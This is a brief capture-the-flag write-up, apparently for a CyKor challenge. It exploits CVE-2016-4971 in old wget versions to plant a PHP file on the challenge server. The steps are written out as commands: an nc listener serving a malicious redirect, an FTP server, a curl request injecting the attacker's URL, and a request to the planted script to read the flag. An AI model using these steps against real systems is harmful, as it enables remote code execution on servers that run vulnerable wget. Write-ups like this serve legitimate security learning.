This challenge used wget (version prior 1.18). This version was affected by CVE-2016-4971 (http://seclists.org/oss-sec/2016/q3/34) which allows us to change the requested filename, if we redirect the download via ftp.
Provide a fake webserver with redirect
cat redirect.http | nc -vlp 8088
Provide a simple ftp Server
twistd -n ftp -p 8089 -r /tmp/ftp/
Inject the controlled url
curl "http://chal.cykor.kr:8082/index.php" --data "image=http://hostname:8088/avatar.png"
Get folder name of my session ("99c378ec5ba2e61d86d8") in this case and finally get the flag
curl "http://chal.cykor.kr:8082/data/99c378ec5ba2e61d86d8/test.php?x=/flag_is_heeeeeeeereeeeeee"
"1-day is not trendy enough"